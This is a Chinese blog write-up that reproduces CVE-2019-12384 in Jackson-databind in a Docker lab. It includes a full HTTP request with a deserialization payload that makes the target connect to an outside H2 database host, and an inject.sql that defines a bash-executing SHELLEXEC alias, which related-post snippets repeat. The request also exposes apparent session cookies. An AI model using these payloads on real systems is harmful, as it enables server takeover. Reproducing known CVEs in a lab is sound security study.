(环境搭建+复现)CVE-2019-12384 Jackson 远程代码执行漏洞

最新推荐文章于 2024-08-10 21:53:13 发布
最新推荐文章于 2024-08-10 21:53:13 发布
阅读量4.4k 收藏 3
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40989258/article/details/105206853
版权

1、【CVE编号】

CVE-2019-12384

2、【漏洞名称】

Jackson 远程命令执行漏洞

3、【靶标分类】

Web类型类靶标

4、【影响版本】

Jackson-databind 2.X < 2.9.9.1

5、【漏洞分类】

代码执行

6、【漏洞等级】

7、【漏洞简介】

由于Jackson黑名单过滤不完整而导致,当开发人员在应用程序中通过ObjectMapper对象调用enableDefaultTyping方法时,程序就会受到此漏洞的影响,攻击者就可利用构造的包含有恶意代码的json数据包对应用进行攻击,直接获取服务器控制权限。

8、【靶标运行环境】

标靶运行操作系统系统:Ubuntu1804 64位
操作系统内核:4.15.0-92-generic
容器版本:jackson 2.9.8
端口号:8080
工具:burpsuite,docker

9、【靶标搭建过程】

1、创建在桌面一个docker-compose 配置文件

version: '2'
services:
  web:
    image: tech1iu/servlet-with-jackson:2.9.8
    container_name: jackson-fuckme
    ports:
      -  "8080:8080"

2、docker-compose up -d
在这里插入图片描述
3、访问192.168.152.130:8080,搭建成功
在这里插入图片描述
10、【靶场利用过程】
1、SSRF

POST /fuckme HTTP/1.1
Host: 192.168.152.130:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: pro_end=-1; ltd_end=-1; order=id%20desc; memSize=2978; sites_path=/www/wwwroot; serverType=nginx; backup_path=/www/backup; force=0; load_page=null; load_search=undefined; pnull=nullnot_load; uploadSize=1073741824; rank=a; SetName=; site_type=-1; ChangePath=3; vcodesum=9; SESScc3cfa2752cb20299766315b04dc7f8a=DUjfNVloT1dZgF2MyF2qjBGeEIPVWnRLF2aOvs7q808; request_token=S3WKG02B2DYSeyCaHQrfoZQfUirBwH1eq6sg9SYYhZnrvWFN; softType=10; load_type=10; Path=/www/server/panel/plugin/free_waf; aceEditor=%7B%22fontSize%22%3A%2213px%22%2C%22theme%22%3A%22monokai%22%7D
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 113

poc=["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:tcp://47.101.72.112:1888/~/test"}]

在这里插入图片描述
2、RCE
利用此服务器的SSRF漏洞请求恶意文件
inject.sql

CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
        String[] command = {"bash", "-c", cmd};
        java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
        return s.hasNext() ? s.next() : "";  }
$$;
CALL SHELLEXEC('touch shell.txt')

在这里插入图片描述
在这里插入图片描述
进入容器查看是否创建shell.txt成功
docker exec -it 5b54ee8a51d9 bash

在这里插入图片描述
11、【解决方案】
官方已经在2.9.9.1版本中修复该漏洞,请用户尽快升级至2.9.9.1及以上版本进行防护。

下载链接:https://github.com/FasterXML/jackson-databind/releases

Referer:
https://github.com/cnsimo/vu1hub/tree/master/jackson/CVE-2019-12384-RCE

daxi0ng
关注
专栏目录
复现CVE-2021-2109 (Weblogic Server远程代码执行漏洞)
记录并分享学习安全的知识点..
01-19 4044
一、漏洞介绍 2021年1月20日,Oracle官方发布了漏洞补丁,修了包括 CVE-2021-2109 Weblogic Server远程代码执行漏洞在内的多个高危严重漏洞CVE-2021-2109 中,攻击者可构造恶意请求,造成JNDI注入,执行任意代码,从而控制服务器。 二、影响版本 WebLogic 3.6.0.0 WebLogic 1.3.0.0 WebLogic 2.1.3.0 WebLogic 2.1.4.0 漏洞判别方式:http://x.x.x.x:7001/conso
CVE-2020-13942 Apache Unomi 远程代码执行漏洞复现
m0_56642842的博客
08-31 299
0x00 简介 Apache Unomi 是一个基于标准的客户数据平台(CDP,Customer Data Platform),用于管理在线客户和访客等信息,以提供符合访客隐私规则的个性化体验,比如 GDPR 和“不跟踪”偏好设置。其最初于 Jahia 开发,2015 年 10 月提交给了 Apache 孵化器。Apache Unomi 具有隐私管理、用户/事件/目标跟踪、报告、访客资料管理、细分、角色、A/B 测试等功能,它可以作为:Web CMS 个性化服务、原生移动应用的分析服务、具有分段功能的集中配
Jackson 远程命令执行漏洞CVE-2019-12384
玄道的网安博客
06-26 8214
前言 由于Jackson黑名单过滤不完整而导致,当开发人员在应用程序中通过ObjectMapper对象调用enableDefaultTyping方法时,程序就会受到此漏洞的影响,攻击者就可利用构造的包含有恶意代码的json数据包对应用进行攻击,直接获取服务器控制权限。 影响版本 Jackson-databind 2.0.0 ~2.9.9.1 环境搭建 创建一个docker-compose.yml的文件 version: '2' services: web: image: te
CVE-2019-12384 jackson ssrf-rce漏洞复现
ZJT6666666的博客
12-28 868
CVE-2019-12384 jackson ssrf-rce漏洞复现
jackson反序列化漏洞
最新发布
l_l_c_q的博客
08-10 1217
jackson反序列化漏洞及POC
jackson 反序列化string_漏洞预警|Jackson远程代码执行高危漏洞分析(CVE201912384)...
weixin_35128151的博客
11-29 671
漏洞描述近日,HSCERT监测到,国外安全研究员在分析一个使用Jackson库对JSON进行反序列化的应用程序时,发现了一个反序列化漏洞,可以控制要反序列化的类。我们分析复现如何利用此反序列化漏洞来触发服务器端请求伪造(SSRF)漏洞远程代码执行漏洞(RCE)。漏洞对应的编号为CVE-2019-12384,RedHat的多个分支受该漏洞影响,如下所示:触发条件触发这个Jackson漏洞...
CDH6.3.1集群修复Jackson-databind远程代码执行漏洞 CVE-2019-12384
u011250186的博客
08-10 627
CDH6.3.1集群修复Jackson-databind远程代码执行漏洞 CVE-2019-12384
Jackson反序列化远程代码执行漏洞CVE-2020-24616)复现
玄道的网安博客
04-26 2797
简介 FasterXML Jackson是美国FasterXML公司的一款适用于Java的数据处理工具。jackson-databind是其中的一个具有数据绑定功能的组件。 影响版本 jackson-databind < 2.9.10.6 环境搭建 搭建一个Java项目,新建一个Poc类,下载并导入存在漏洞的包 导入存在漏洞的包 exp文件 编译并启动环境 javac Exploit.java py -3 -m http.server 88...
FasterXML/jackson-databind 远程代码执行漏洞CVE-2020-8840)复现
玄道的网安博客
12-12 6448
漏洞概述 FFasterXML/jackson-databind是一个用于JSON和对象转换的Java第三方库,可将Java对象转换成json对象和xml文档,同样也可将json对象转换成Java对象。 此次漏洞中攻击者可利用xbean-reflect的利用链触发JNDI远程类加载从而达到远程代码执行。 影响版本 2.0.0 <= FasterXML jackson-databind Version <= 2.9.10.2 环境搭建 项目地址: h...
Jackson-databind 反序列化漏洞CVE-2017-7525)复现
HEAVEN569的博客
03-12 2036
1.漏洞出现的原因 Jackson-databind 支持 Polymorphic Deserialization 特性(默认情况下不开启),当json字符串转换的Target class中有polymorph fields,即字段类型为接口、抽象或Object类型时,攻击者可以通过在json字符串中指定变量的具体类型(子类或者接口实现类,)来实现实例化指定的类,借助某些特殊的class,如TemplatesImpl,可以实现任意代码执行。 所以本漏洞利用条件如下 1.开启JacksonPo..
Jackson-databind 反序列化漏洞复现CVE-2017-7525)
whojoe的博客
05-26 3506
Jackson-databind 反序列化漏洞复现CVE-2017-7525)环境搭建启动docker下载环境生成docker环境漏洞检测区分 Fastjson 和 Jackson漏洞复现小结参考文章 环境搭建 启动docker systemctl start docker 下载环境 git clone https://github.com/vulhub/vulhub.git 也可以使用码云上个人维护的镜像 git clone https://gitee.com/fahawifi/vulhub.git
Jackson_RCE-CVE-2019-12384:CVE-2019-12384 漏洞测试环境
05-26
环境搭建 将项目导入到idea,再配置好maven之后设置自动导入依赖库,然后在本地的web空目录写入如下文件,保存为exec.sql。并启动一个http server: CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException { String[] command = {"/bin/bash", "-c", cmd}; java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\0A"); return s.hasNext() ? s.next() : ""; } $$; CALL SHEL
java 漏洞复现_CVE-2019-12384漏洞分析及复现
weixin_42463997的博客
03-02 1109
原标题:CVE-2019-12384漏洞分析及复现*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。引言近期关于Jackson的RCE漏洞CVE-2019-12384爆出,关于漏洞复现以及依赖,这里已经给出,笔者这边使用java的环境重新复现了一下,权当给各位看官当个翻译,也让在java上进行漏洞复现的兄弟们少走点弯路。环境准备本...
Jackson 反序列化远程代码执行漏洞复现
Ms08067安全实验室
07-24 2250
本文作者:light(Ms08067实验室 SRSP TEAM小组成员)jackson介绍Jackson是一个能够将java对象序列化为JSON字符串,也能够将JSON字符串反序列化为j...
jackson框架java反序列化漏洞_预警Jackson < 2.9.9.1 反序列化远程代码执行漏洞(CVE-2019-12384)...
weixin_42540248的博客
03-06 586
2019年7月23日,本站安全专题监测到有安全研究人员披露Jackson < 2.9.9.1 存在反序列化远程代码执行漏洞(CVE-2019-12384),利用可导致远程执行服务器命令,官方git已发布公告说明,请使用到Jackson的用户尽快升级至安全版本。漏洞描述Jackson是一套开源java高性能JSON处理器,其在反序列化处理JSON格式时存在缺陷,当用户提交一个精心构造的恶意JS...
jackson框架java反序列化漏洞_Jackson CVE-2019-12384: 反序列化漏洞复现
weixin_39830200的博客
02-23 452
文章参考:https://blog.doyensec.com/2019/07/22/jackson-gadgets.html环境搭建引入jar包:ssrf payload:"[\"ch.qos.logback.core.db.DriverManagerConnectionSource\", {\"url\":\"jdbc:h2:tcp://139.196.103.119:9999/test\"}]...
vulhub漏洞复现29_Jackson
weixin_44193247的博客
02-03 1045
vulhub漏洞复现练习篇
jackson-cve-2019-12384
haha1314的博客
08-07 633
jackson-cve-2019-12384Jackson库对 JSON 进行反序列化的时候,存在反序列化漏洞,控制好反序列化的类,就能触发服务端请求伪造(SSRF)和远程代码执行漏洞(RCE)。 漏洞原理和分析参考: 运行漏洞环境: git clone https://github.com/cnsimo/vu1hub.git cd vu1hub/jackson/CVE-2019-12384-RCE/ docker-compose up -d 服务器IP:192.168.88.13 攻击机kali:1
jackson CVE-2017-7525 漏洞复现
Shanfenglan's blog
11-29 1704
CVE-2017-7525 Jackson-databind 反序列化漏洞 原理 Jackson-databind 在设置 Target class 成员变量参数值时,若没有对应的 getter 方法,则会使用 SetterlessProperty 调用 getter 方法,获取变量,然后设置变量值。当调用 getOutputProperties() 方法时,会初始化 transletBytecodes 包含字节码的类,导致命令执行,具体可参考 java-deserialization-jdk7u21-ga
搭建Drupal远程代码执行漏洞环境(CVE-2019-6340)
以上是有关Drupal Core RESTful远程代码执行漏洞CVE-2019-6340)的详细知识点介绍,涵盖了Drupal的概述、RESTful API、远程代码执行漏洞的概念,以及如何利用docker-compose搭建漏洞环境,旨在为IT专业人员提供...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值